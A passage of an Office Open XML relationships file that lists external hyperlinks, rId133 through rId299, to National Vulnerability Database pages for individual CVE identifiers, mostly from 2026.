Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100256" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101885" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102112" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102113" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102118" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47489" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47491" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47493" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47494" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47495" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47497" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47498" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47499" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47500" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47501" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47502" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47503" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47504" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47505" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47507" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47508" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47510" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47511" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47512" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47513" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47514" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47516" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47519" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47520" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47521" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47523" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47528" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47530" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47535" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47536" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47540" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47541" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47545" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47548" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47550" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47551" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47552" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47553" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47556" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47558" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47559" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47560" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47561" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47563" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47569" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47570" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47571" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47572" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47573" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47574" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47575" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47577" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47578" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47579" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47583" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47585" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47587" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47588" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47589" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47590" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47591" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47592" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47593" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47594" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47595" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47597" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47599" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47600" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47601" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53605" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62146" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100266" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100268" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47576" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100262" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19553" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55177" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62085" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62097" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94082" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96345" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96346" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96827" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96828" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54402" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54403" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58387" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101884" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102091" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102128" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102143" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102717" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103472" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103591" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6806" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75098" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76145" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80276" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85532" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89294" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92121" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92245" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94002" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94120" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94123" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94178" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95587" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95616" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96348" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96818" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96823" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97197" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97240" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97241" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97244" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102123" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103446" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101295" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103229" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103231" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103530" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103536" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47496" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47580" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76143" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102089" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102093" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102094" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102096" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102097" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102098" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102099" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102108" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102114" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102116" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102117" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102119" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102129" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102130" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102131" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102132" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102142" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102150" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102392" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103441" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103442" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79625" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85679" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93624" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93651" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93771" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94122" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94677" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96343" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96344" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96561" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96815" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96832" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96833" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97245" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97256" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97347" TargetMode="External" Id="rId299" /><Relationship 